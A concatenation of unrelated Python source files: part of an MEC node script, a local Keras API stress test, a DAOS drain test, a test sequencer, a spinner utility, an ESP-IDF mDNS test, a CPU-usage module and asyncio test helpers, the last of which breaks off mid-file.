cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
    parser.add_argument('--mec_no', type=int, default=1, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
stress_test.py
|
"""
Stress test for server
.. code-block:: bash
python stress_test.py
"""
# import the necessary packages
from threading import Thread
import requests
import time
# initialize the Keras REST API endpoint URL along with the input
# image path
KERAS_REST_API_URL = "http://localhost/predict"
IMAGE_PATH = "jemma.png"
# initialize the number of requests for the stress test along with
# the sleep amount between requests
NUM_REQUESTS = 500
SLEEP_COUNT = 0.05
def call_predict_endpoint(n):
"""
call the predication api
Args:
n: ``int``
called number
"""
# load the input image and construct the payload for the request
image = open(IMAGE_PATH, "rb").read()
payload = {"image": image}
# submit the request
r = requests.post(KERAS_REST_API_URL, files=payload).json()
    # ensure the request was successful
if r["success"]:
print("[INFO] thread {} OK".format(n))
# otherwise, the request failed
else:
print("[INFO] thread {} FAILED".format(n))
# loop over the number of requests, starting one thread per request
for i in range(0, NUM_REQUESTS):
# start a new thread to call the API
t = Thread(target=call_predict_endpoint, args=(i,))
t.daemon = True
t.start()
time.sleep(SLEEP_COUNT)
# insert a long sleep so we can wait until the server is finished
# processing the images
time.sleep(300)
|
osa_online_drain.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import random
import threading
from write_host_file import write_host_file
from osa_utils import OSAUtils
from daos_utils import DaosCommand
from apricot import skipForTicket
class OSAOnlineDrain(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
def run_online_drain_test(self, num_pool, oclass=None, app_name="ior"):
"""Run the Online drain without data.
Args:
num_pool(int) : total pools to create for testing purposes.
oclass(str) : Object class type (RP_2G1, etc)
app_name(str) : application to run on parallel (ior or mdtest)
Defaults to ior.
"""
# Create a pool
self.pool = []
target_list = []
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
test_seq = self.ior_test_sequence[0]
drain_servers = (len(self.hostlist_servers) * 2) - 1
        # Pick two random adjacent targets to drain (target idx : 0-7)
n = random.randint(0, 6)
target_list.append(n)
target_list.append(n+1)
t_string = "{},{}".format(target_list[0], target_list[1])
# Drain one of the ranks (or server)
rank = random.randint(1, drain_servers)
for val in range(0, num_pool):
self.pool.append(self.get_pool())
self.pool[-1].set_property("reclaim", "disabled")
# Drain the rank and targets
for val in range(0, num_pool):
threads = []
# Instantiate aggregation
if self.test_during_aggregation is True:
for _ in range(0, 2):
self.run_ior_thread("Write", oclass, test_seq)
self.delete_extra_container(self.pool[val])
# The following thread runs while performing osa operations.
if app_name == "ior":
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test_seq}))
else:
threads.append(threading.Thread(target=self.run_mdtest_thread))
# Launch the IOR threads
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
# Wait the threads to write some data before drain.
time.sleep(5)
self.pool[val].display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
self.log.info("Pool Version at the beginning %s", pver_begin)
output = self.dmg_command.pool_drain(
self.pool[val].uuid, rank, t_string)
self.print_and_assert_on_rebuild_failure(output)
pver_drain = self.get_pool_version()
self.log.info("Pool Version after drain %s", pver_drain)
            # Check pool version incremented after pool drain
self.assertTrue(pver_drain > pver_begin,
"Pool Version Error: After drain")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
for val in range(0, num_pool):
display_string = "Pool{} space at the End".format(val)
self.pool[val].display_pool_daos_space(display_string)
self.run_ior_thread("Read", oclass, test_seq)
self.container = self.pool_cont_dict[self.pool[val]][0]
kwargs = {"pool": self.pool[val].uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7289")
def test_osa_online_drain(self):
"""Test ID: DAOS-4750
Test Description: Validate Online drain with checksum
enabled.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_with_csum
"""
self.log.info("Online Drain : With Checksum")
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_no_csum(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain without enabling
checksum.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa
:avocado: tags=osa_drain,online_drain,online_drain_without_csum
"""
self.log.info("Online Drain : No Checksum")
self.test_with_checksum = self.params.get("test_with_checksum",
'/run/checksum/*')
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_oclass(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain with different
object class.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_oclass
"""
self.log.info("Online Drain : Oclass")
for oclass in self.test_oclass:
self.run_online_drain_test(1, oclass=oclass)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_with_aggregation(self):
"""Test ID: DAOS-6909
Test Description: Validate Online drain with different
object class.
:avocado: tags=all,pr,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_with_aggregation
"""
self.log.info("Online Drain : Aggregation")
self.test_during_aggregation = self.params.get("test_with_aggregation",
'/run/aggregation/*')
self.run_online_drain_test(1)
@skipForTicket("DAOS-7289")
def test_osa_online_drain_mdtest(self):
"""Test ID: DAOS-4750
Test Description: Validate Online drain with mdtest
running during the testing.
:avocado: tags=all,pr,daily_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=osa,checksum
:avocado: tags=osa_drain,online_drain,online_drain_mdtest
"""
self.log.info("Online Drain : With Mdtest")
self.run_online_drain_test(1, app_name="mdtest")
|
iris.py
|
#! /usr/bin/python
"""
Test sequencer for any production testing
"""
import os
import argparse
import sys
import threading
from queue import Queue
from test_runner import runner
import listener.listener as listener
import logging
import tornado
import json
import pathlib
import yaml
import logging.config
PORT = 4321
PARSER = argparse.ArgumentParser(description="Iris test sequencer.")
PARSER.add_argument("--single_run", "-s", help="Run only once", action="store_true")
PARSER.add_argument(
"--create",
"-c",
metavar='path',
type=str,
nargs=1,
help="Creates empty/example test COMMON_definitions",
)
PARSER.add_argument("--report_off", "-r", help="Don't create test report", action="store_true")
PARSER.add_argument(
"--listener",
"-l",
help="Creates HTTP listener. Testing is then started through REST API.",
action="store_true",
)
PARSER.add_argument(
"-d",
"--dry-run",
help="Replaces instruments with mock objects.",
action="store_true",
)
PARSER.add_argument(
"-m",
"--mock",
help=r"""Replaces listed instruments with mock objects. Usage: iris.py -m INSTRUMENT1 INSTRUMENT2 ...""",
nargs='+'
)
PARSER.add_argument(
"-i",
"--inverse-mock",
help=r"""Replaces all but listed instruments with mock objects. Usage: iris.py -m INSTRUMENT1 INSTRUMENT2 ...""",
nargs='+'
)
PARSER.add_argument(
"-v",
"--verbose",
help="Increase output verbosity. Sets root logger to debug level.",
action="store_true",
)
PARSER.add_argument(
"-b",
"--no-browser",
help="Don't try to open web browser.",
action="store_true",
)
PARSER.add_argument(
"--list-applications",
"-a",
help="Lists available application on the connected Gaia tester (G5 or other). Gaia instrument must be defined and available.",
action="store_true",
)
PARSER.add_argument('-p', '--port', help="Set port to listen", type=int)
ARGS = PARSER.parse_args()
LOG_SETTINGS_FILE = pathlib.Path('test_definitions/common/logging.yaml')
if LOG_SETTINGS_FILE.is_file():
with LOG_SETTINGS_FILE.open() as _f:
LOG_CONF = yaml.safe_load(_f.read())
pathlib.Path(LOG_CONF['log_file_path']).mkdir(parents=True, exist_ok=True)
logging.config.dictConfig(LOG_CONF)
logging.info('Logging with configuration from %s', LOG_SETTINGS_FILE)
else:
logging.basicConfig(level=logging.INFO)
logging.warning('Cannot find logging settings. Logging with basicConfig.')
if ARGS.verbose:
logging.getLogger().setLevel(logging.DEBUG)
LOGGER = logging.getLogger(__name__)
LOGGER.debug("Logging initialized")
LOGGER.info("Logging initialized")
if ARGS.create:
from distutils.dir_util import copy_tree
from test_definition_template.sequences import example_sequence
from test_definition_template import test_case_pool
TEST_DEF_PATH = os.path.join("./test_definitions/sequences", ARGS.create[0])
if os.path.isdir(TEST_DEF_PATH):
LOGGER.warning("Test sequence " + ARGS.create[0] + " already exists")
sys.exit(-1)
copy_tree(example_sequence.__path__[0], TEST_DEF_PATH)
copy_tree(test_case_pool.__path__[0], './test_definitions/test_case_pool')
if not os.path.isdir('./test_definitions/common'):
from test_definition_template import common
copy_tree(common.__path__[0], './test_definitions/common')
import additional_dist_files
from shutil import copyfile
copyfile(additional_dist_files.__path__[0] + '/Dockerfile', './Dockerfile')
copyfile(additional_dist_files.__path__[0] + '/docker-compose.yml', './docker-compose.yml')
else:
LOGGER.info('./test_definitions/common already exists. Not copying it.')
sys.exit(0)
CONTROL = runner.get_test_control(LOGGER)
COMMON_DEFINITIONS = runner.get_common_definitions()
SETTINGS_FILE = pathlib.Path('station_settings.yaml')
if SETTINGS_FILE.is_file():
with SETTINGS_FILE.open() as _f:
COMMON_DEFINITIONS.SETTINGS = yaml.safe_load(_f.read())
if ARGS.list_applications:
# Print available applications and actions
class GaiaJsonEncoder(json.JSONEncoder):
'''Encode json properly'''
def default(self, obj):
if callable(obj):
return obj.__name__
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
# Todo: Initialization not working like this anymore
COMMON_DEFINITIONS.instrument_initialization()
client = COMMON_DEFINITIONS.INSTRUMENTS['gaia']
print(json.dumps(client.applications, indent=4, sort_keys=True, cls=GaiaJsonEncoder))
print(json.dumps(client.state_triggers, indent=4, sort_keys=True, cls=GaiaJsonEncoder))
sys.exit()
CONTROL['run'].set()
if ARGS.dry_run:
CONTROL['dry_run'] = True
if ARGS.mock:
CONTROL['mock'] = ARGS.mock
if ARGS.inverse_mock:
CONTROL['inverse_mock'] = ARGS.inverse_mock
if ARGS.single_run:
CONTROL['single_run'] = True
if ARGS.report_off:
CONTROL['report_off'] = True
DUT_SN_QUEUE = Queue()
MESSAGE_QUEUE = Queue()
PROGRESS_QUEUE = Queue()
LISTENER_ARGS = {'database': None, 'download_path': None}
if hasattr(COMMON_DEFINITIONS, 'listener_args'):
COMMON_DEFINITIONS.listener_args(LISTENER_ARGS)
RUNNER_THREAD = threading.Thread(
target=runner.run_test_runner,
args=(CONTROL, MESSAGE_QUEUE, PROGRESS_QUEUE, DUT_SN_QUEUE, LISTENER_ARGS),
name='test_runner_thread',
)
RUNNER_THREAD.daemon = True
RUNNER_THREAD.start()
class MessageHandler:
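    # Intended to run as a thread target: blocks on the queue and fans every
    # received message out to each registered handler callable.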
def __init__(self, message_queue, message_handler):
while True:
msg = message_queue.get()
for handler in message_handler:
handler(msg)
MESSAGE_HANDLER = []
# If you want to also print message, add print handler like this:
# MESSAGE_HANDLER = [print]
MESSAGE_THREAD = threading.Thread(
target=MessageHandler, args=(MESSAGE_QUEUE, MESSAGE_HANDLER), name='message_thread'
)
PROGRESS_HANDLER = []
# If you want to also print message, add print handler like this:
# PROGRESS_HANDLER = [print]
PROGRESS_THREAD = threading.Thread(
target=MessageHandler, args=(PROGRESS_QUEUE, PROGRESS_HANDLER), name='progress_thread'
)
PROGRESS_THREAD.daemon = True
MESSAGE_THREAD.daemon = True
PROGRESS_THREAD.start()
MESSAGE_THREAD.start()
if ARGS.listener:
if ARGS.port:
PORT = ARGS.port
if not ARGS.no_browser:
import webbrowser
webbrowser.open("http://localhost:" + str(PORT))
listener.create_listener(
PORT,
CONTROL,
MESSAGE_HANDLER,
PROGRESS_HANDLER,
COMMON_DEFINITIONS,
DUT_SN_QUEUE,
LISTENER_ARGS,
)
tornado.ioloop.IOLoop.current().start()
# MESSAGE_HANDLER = print
RUNNER_THREAD.join()
|
spinning_cursor.py
|
"""
source: https://stackoverflow.com/questions/4995733/how-to-create-a-spinning-command-line-cursor
"""
import sys
import time
import threading
class Spinner:
busy = False
delay = 0.01
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
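# Example usage (illustrative): the spinner animates on stdout until the
# with-block exits.
#
#     with Spinner(delay=0.05):
#         time.sleep(3)  # stand-in for long-running work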
|
mdns_example_test.py
|
import re
import os
import sys
import socket
import time
import struct
import dpkt
import dpkt.dns
from threading import Thread, Event
# this is a test case write with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set environment variable `TEST_FW_PATH`,
# then get and insert `TEST_FW_PATH` to sys path before import FW module
try:
import IDF
except ImportError:
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
stop_mdns_server = Event()
esp_answered = Event()
def get_dns_query_for_esp(esp_host):
dns = dpkt.dns.DNS(b'\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01')
dns.qd[0].name = esp_host + u'.local'
print("Created query for esp host: {} ".format(dns.__repr__()))
return dns.pack()
def get_dns_answer_to_mdns(tester_host):
dns = dpkt.dns.DNS(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
dns.op = dpkt.dns.DNS_QR | dpkt.dns.DNS_AA
dns.rcode = dpkt.dns.DNS_RCODE_NOERR
arr = dpkt.dns.DNS.RR()
arr.cls = dpkt.dns.DNS_IN
arr.type = dpkt.dns.DNS_A
arr.name = tester_host
arr.ip = socket.inet_aton('127.0.0.1')
    dns.an.append(arr)
print("Created answer to mdns query: {} ".format(dns.__repr__()))
return dns.pack()
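# Minimal mDNS peer for the test: keeps multicasting an A query for the ESP's
# hostname until it is answered, and replies to the ESP's query for
# 'tinytester.local' with 127.0.0.1.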
def mdns_server(esp_host):
global esp_answered
UDP_IP = "0.0.0.0"
UDP_PORT = 5353
MCAST_GRP = '224.0.0.251'
TESTER_NAME = u'tinytester.local'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((UDP_IP,UDP_PORT))
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
sock.settimeout(30)
while not stop_mdns_server.is_set():
try:
if not esp_answered.is_set():
sock.sendto(get_dns_query_for_esp(esp_host), (MCAST_GRP,UDP_PORT))
time.sleep(0.2)
data, addr = sock.recvfrom(1024)
dns = dpkt.dns.DNS(data)
if len(dns.qd) > 0 and dns.qd[0].type == dpkt.dns.DNS_A:
if dns.qd[0].name == TESTER_NAME:
print("Received query: {} ".format(dns.__repr__()))
sock.sendto(get_dns_answer_to_mdns(TESTER_NAME), (MCAST_GRP,UDP_PORT))
if len(dns.an) > 0 and dns.an[0].type == dpkt.dns.DNS_A:
if dns.an[0].name == esp_host + u'.local':
print("Received answer to esp32-mdns query: {}".format(dns.__repr__()))
esp_answered.set()
except socket.timeout:
break
except dpkt.UnpackError:
continue
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_mdns(env, extra_data):
    """
    steps: |
      1. join AP + init mdns example
      2. get the dut host name (and IP address)
      3. check the mdns name is accessible
      4. check DUT output if mdns advertised host is resolved
    """
    global stop_mdns_server
dut1 = env.get_dut("mdns-test", "examples/protocols/mdns")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "mdns-test.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("mdns-test_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("mdns-test_bin_size", bin_size // 1024)
# 1. start mdns application
dut1.start_app()
# 2. get the dut host name (and IP address)
specific_host = dut1.expect(re.compile(r"mdns hostname set to: \[([^\]]+)\]"), timeout=30)
specific_host = str(specific_host[0])
thread1 = Thread(target=mdns_server, args=(specific_host,))
thread1.start()
try:
try:
dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# 3. check the mdns name is accessible
if not esp_answered.wait(timeout=30):
raise ValueError('Test has failed: did not receive mdns answer within timeout')
        # 4. check DUT output if mdns advertised host is resolved
dut1.expect(re.compile(r"mdns-test: Query A: tinytester.local resolved to: 127.0.0.1"), timeout=30)
finally:
stop_mdns_server.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mdns()
|
lib_raise_cpu.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# This file is part of Raise.
# Raise is a small build automation tool that ships with your software.
# Raise uses a MIT style license, and is hosted at https://github.com/workhorsy/raise .
# Copyright (c) 2012-2017 Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, re
import subprocess
import threading
import atexit
import lib_raise_helpers as Helpers
import lib_raise_config as Config
import lib_raise_users as Users
import osinfo
import cpuinfo
import findlib
arch = None
bits = None
mhz = None
name = None
vendor_name = None
flags = []
cpus_total = None
cpus_free = None
cpu_utilization = 0.0
utilization_thread = None
is_utilization_thread_running = False
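# Background sampler: repeatedly runs the platform-appropriate `top` command
# (or `wmic` on Windows), parses the CPU usage percentages, and stores the
# result in the module-level cpu_utilization.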
def _get_utilization_thread():
global cpu_utilization
global is_utilization_thread_running
is_utilization_thread_running = True
while is_utilization_thread_running:
# Get the cpu percentages
speed = 0
out = None
if Config.os_type in osinfo.OSType.Linux or Config.os_type in osinfo.OSType.Cygwin:
command = 'top -b -n 2 -d 1'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("%Cpu(s):")[2]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('us')[0]) + \
float(out[1].split('sy')[0]) + \
float(out[2].split('ni')[0])
elif Config.os_type in osinfo.OSType.BSD:
command = 'top -b -P -s 2 -d 2'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("CPU:")[1]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('% user')[0]) + \
float(out[1].split('% nice')[0]) + \
float(out[2].split('% system')[0])
elif Config.os_type in osinfo.OSType.MacOS:
command = 'top -F -l 2 -i 2 -n 0'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("CPU usage:")[2]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('% user')[0]) + \
float(out[1].split('% sys')[0])
elif Config.os_type in osinfo.OSType.Solaris:
command = 'top -b -s 2 -d 2'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("CPU states: ")[2]
out = out.split('\n')[0]
out = out.split(',')
# Add the percentages to get the real cpu usage
speed = \
float(out[0].split('% user')[0]) + \
float(out[1].split('% nice')[0]) + \
float(out[2].split('% kernel')[0])
elif Config.os_type in osinfo.OSType.BeOS:
command = 'top -d -i 2 -n 2'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split("------")[1]
out = out.split('% TOTAL')[0]
out = out.split()
# Add the percentages to get the real cpu usage
speed = float(out[-1])
elif Config.os_type in osinfo.OSType.Windows:
command = 'wmic cpu get loadpercentage'
out = findlib.run_and_get_stdout(command)
# Get the cpu percentages
out = out.split()[-1]
# Add the percentages to get the real cpu usage
speed = float(out)
cpu_utilization = speed
def get_utilization():
global cpu_utilization
return cpu_utilization
def start_get_utilization_thread():
global utilization_thread
utilization_thread = threading.Thread(target=_get_utilization_thread, args=())
utilization_thread.daemon = True
utilization_thread.start()
def setup():
global arch
global bits
global mhz
global name
global vendor_name
global flags
global cpus_total
global cpus_free
info = cpuinfo.get_cpu_info()
# Make sure to show an error if we can't get any CPU info
if not info:
Config.early_exit('Failed to get CPU info.')
# Make sure to show an error if we could not get the CPU arch or bits
if not info['arch'] or not info['bits']:
Config.early_exit('Unknown CPU architecture "{0}".'.format(info['raw_arch_string']))
# Get the CPU arch
arch = info['arch']
# Get the CPU bits
bits = info['bits']
# Get the CPU MHz
mhz = info['hz_advertised']
# Get the CPU name
name = info['brand']
# Get the CPU vendor name
vendor_name = info['vendor_id']
# Get the CPU features
flags = info['flags']
# Figure out how many cpus there are
cpus_total = info['count']
cpus_free = cpus_total
start_get_utilization_thread()
def exit_module():
global utilization_thread
global is_utilization_thread_running
if is_utilization_thread_running and utilization_thread:
is_utilization_thread_running = False
utilization_thread.join()
utilization_thread = None
setup()
atexit.register(exit_module)
|
test_utils.py
|
"""Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import sys
import tempfile
import threading
import time
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import socketserver
from http.server import HTTPServer
except ImportError:
# Python 2
import SocketServer as socketserver
from BaseHTTPServer import HTTPServer
try:
from unittest import mock
except ImportError:
# Python < 3.3
import mock
try:
import ssl
from .py3_ssl import SSLContext, wrap_socket
except ImportError: # pragma: no cover
# SSL support disabled in Python
ssl = None
from . import base_events
from . import compat
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
try:
# Prefer unittest2 if available (on Python 2)
import unittest2 as unittest
except ImportError:
import unittest
skipIf = unittest.skipIf
skipUnless = unittest.skipUnless
SkipTest = unittest.SkipTest
if not hasattr(unittest.TestCase, 'assertRaisesRegex'):
class _BaseTestCaseContext:
def __init__(self, test_case):
self.test_case = test_case
def _raiseFailure(self, standardMsg):
msg = self.test_case._formatMessage(self.msg, standardMsg)
raise self.test_case.failureException(msg)
class _AssertRaisesBaseContext(_BaseTestCaseContext):
def __init__(self, expected, test_case, callable_obj=None,
expected_regex=None):
_BaseTestCaseContext.__init__(self, test_case)
self.expected = expected
self.test_case = test_case
if callable_obj is not None:
try:
self.obj_name = callable_obj.__name__
except AttributeError:
self.obj_name = str(callable_obj)
else:
self.obj_name = None
if isinstance(expected_regex, (bytes, str)):
expected_regex = re.compile(expected_regex)
self.expected_regex = expected_regex
self.msg = None
def handle(self, name, callable_obj, args, kwargs):
"""
If callable_obj is None, assertRaises/Warns is being used as a
context manager, so check for a 'msg' kwarg and return self.
If callable_obj is not None, call it passing args and kwargs.
"""
if callable_obj is None:
self.msg = kwargs.pop('msg', None)
return self
with self:
callable_obj(*args, **kwargs)
class _AssertRaisesContext(_AssertRaisesBaseContext):
"""A context manager used to implement TestCase.assertRaises* methods."""
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
if exc_type is None:
try:
exc_name = self.expected.__name__
except AttributeError:
exc_name = str(self.expected)
if self.obj_name:
self._raiseFailure("{0} not raised by {1}".format(exc_name,
self.obj_name))
else:
self._raiseFailure("{0} not raised".format(exc_name))
if not issubclass(exc_type, self.expected):
# let unexpected exceptions pass through
return False
self.exception = exc_value
if self.expected_regex is None:
return True
expected_regex = self.expected_regex
if not expected_regex.search(str(exc_value)):
self._raiseFailure('"{0}" does not match "{1}"'.format(
expected_regex.pattern, str(exc_value)))
return True
def dummy_ssl_context():
if ssl is None:
return None
else:
return SSLContext(ssl.PROTOCOL_SSLv23)
def run_briefly(loop, steps=1):
@coroutine
def once():
pass
for step in range(steps):
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""loop.stop() schedules _raise_stop_error()
and run_forever() runs until _raise_stop_error() callback.
this wont work if test waits for some IO events, because
_raise_stop_error() runs before any of io events callbacks.
"""
loop.stop()
loop.run_forever()
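# Illustrative sketch (assumed, not from the original file): as the docstring
# above explains, run_once() lets exactly one batch of already-scheduled
# callbacks run before the _raise_stop_error() callback stops the loop.
def _example_run_one_callback(loop):
    results = []
    loop.call_soon(results.append, 'done')
    run_once(loop)
    return results          # ['done'] once the single iteration has run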
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer, object):
request_timeout = 2
def get_request(self):
request, client_addr = super(SilentWSGIServer, self).get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__),
'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
ssock = wrap_socket(request,
keyfile=keyfile,
certfile=certfile,
server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(address, use_ssl, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer, object):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer, object):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super(UnixWSGIServer, self).get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
